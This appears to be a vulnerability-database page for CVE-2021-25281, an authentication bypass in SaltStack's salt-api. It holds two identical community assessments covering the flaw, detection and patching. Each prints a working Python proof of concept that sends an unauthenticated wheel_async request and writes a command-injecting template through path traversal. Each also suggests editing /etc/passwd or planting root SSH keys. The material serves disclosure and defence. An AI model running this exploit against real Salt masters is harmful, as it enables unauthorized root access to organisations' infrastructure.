CVE-2021-25281

An issue was discovered in through SaltStack Salt before 3002.5. salt-api does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.

Recent assessments:

kevthehermit at February 26, 2021 5:08pm UTC reported:

Vulnerability

<https://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/&gt;

This vulnerability is an Auth bypass in the SaltStack API, specifically, when making requests to the wheel_async client no checks are made to verify the requester is authenticated.

Salt stack is commonly used to automate CI/CD tasks and control the installation of software and packages across large organisations, which makes this an interesting target for attackers. The API is not started by default and is an optional component that may limit the attack surface for organisations.

Exploiting

This is fairly trivial to exploit in order to run jobs against the salt master, however, there are some limitation in what actions you can perform. There is no cmd execution function.

a very simple example

import requests
response = requests.post(
    'https://127.0.0.1:8000/run',
    verify=False,
    json={
        'eauth': 'auto',
        'client': 'wheel_async',
        'fun': 'pillar_roots.write',
        'data': '{{ salt["cmd.run"]("id > /tmp/whoami")  }}',
        'path': '../../../../../../srv/salt/pwn.sls',
    },
)
if json := response.json():
    print(f'Got JID: {json["return"][0]["jid"]}, the task was queued successfully')

You can edit the salt master configuration variables which include the ability to set the auth_mode and sharedsecrets if the API is restarted your changes take effect at which point you gain the ability to execute code against the master.

You can pair this with a path traversal vulnerability that was patched at the same time to gain file write into the OS. The default installation on Ubuntu the API runs as root so you can use actions like editing /etc/passwd or writing ssh-keys to /root/.ssh/id_rsa

POC available at <https://github.com/Immersive-Labs-Sec/CVE-2021-25281&gt;

Detection

The API typically runs on HTTPS so unless you are inspecting SSL this may be difficult to detect with traditional packet analysis.
As this is exploiting the async functionality every request to the instance will create a salt job. Salt stores the input and output of every job on disk so can be easy to review post compromise activity.

More details can be found in this article – <https://www.immersivelabs.com/resources/blog/how-to-lock-onto-the-hackers-targeting-saltstack-minions/&gt;

Patching

Patches are available for this both from Salt and most package providers. Hardening your instance to prevent access from untrusted IPs can also reduce the risk.

cdelafuente-r7 at April 09, 2021 4:04pm UTC reported:

Vulnerability

<https://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/&gt;

This vulnerability is an Auth bypass in the SaltStack API, specifically, when making requests to the wheel_async client no checks are made to verify the requester is authenticated.

Salt stack is commonly used to automate CI/CD tasks and control the installation of software and packages across large organisations, which makes this an interesting target for attackers. The API is not started by default and is an optional component that may limit the attack surface for organisations.

Exploiting

This is fairly trivial to exploit in order to run jobs against the salt master, however, there are some limitation in what actions you can perform. There is no cmd execution function.

a very simple example

import requests
response = requests.post(
    'https://127.0.0.1:8000/run',
    verify=False,
    json={
        'eauth': 'auto',
        'client': 'wheel_async',
        'fun': 'pillar_roots.write',
        'data': '{{ salt["cmd.run"]("id > /tmp/whoami")  }}',
        'path': '../../../../../../srv/salt/pwn.sls',
    },
)
if json := response.json():
    print(f'Got JID: {json["return"][0]["jid"]}, the task was queued successfully')

You can edit the salt master configuration variables which include the ability to set the auth_mode and sharedsecrets if the API is restarted your changes take effect at which point you gain the ability to execute code against the master.

You can pair this with a path traversal vulnerability that was patched at the same time to gain file write into the OS. The default installation on Ubuntu the API runs as root so you can use actions like editing /etc/passwd or writing ssh-keys to /root/.ssh/id_rsa

POC available at <https://github.com/Immersive-Labs-Sec/CVE-2021-25281&gt;

Detection

The API typically runs on HTTPS so unless you are inspecting SSL this may be difficult to detect with traditional packet analysis.
As this is exploiting the async functionality every request to the instance will create a salt job. Salt stores the input and output of every job on disk so can be easy to review post compromise activity.

More details can be found in this article – <https://www.immersivelabs.com/resources/blog/how-to-lock-onto-the-hackers-targeting-saltstack-minions/&gt;

Patching

Patches are available for this both from Salt and most package providers. Hardening your instance to prevent access from untrusted IPs can also reduce the risk.

Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5